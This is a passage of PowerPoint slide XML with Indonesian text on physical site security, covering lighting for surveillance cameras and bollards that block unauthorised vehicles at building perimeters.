            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kamera</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penjaga</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menjadi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lebih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mudah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Desain </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pencahayaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perlu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memperhitungkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tingkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>cahaya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>secara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keseluruhan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pencahayaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>permukaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> area </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tertentu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memungkinkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kamera</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melakukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengenalan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>wajah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>misalnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>), dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menghindari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> area </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bayangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>silau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Tonggak-tonggak</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Tonggak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>biasanya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berupa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tiang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>vertikal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pendek</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terbuat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> baja, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>beton</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bahan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> lain yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tahan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> lama dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dipasang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jarak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tertentu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sekeliling</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> perimeter </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pintu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>masuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Terkadang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tonggak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terlihat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jelas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>muncul</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pahatan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>elemen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>desain</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bangunan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Mereka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dipasang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ditarik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>beberapa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> model </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dinaikkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diturunkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jarak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jauh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Bollard </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melayani</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>beberapa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tujuan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melindungi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pejalan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> kaki </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lalu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lintas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kendaraan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mencegah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kendaraan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memberikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> perimeter </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>infrastruktur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>fasilitas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Mereka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sering</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>digunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengamankan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>gedung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemerintah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bandara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>stadion</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pintu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>masuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> toko, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ruang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>publik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lainnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mencegah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kendaraan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memasuki</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> area </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terlarang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tonggak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membantu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengurangi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>risiko</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>serangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kendaraan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kecelakaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Struktur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> yang Ada</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Mungkin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ada</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>beberapa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>opsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyesuaikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> tata </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>letak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lokasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bangunan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sudah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ada</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Ketika </a:t>
            </a:r>
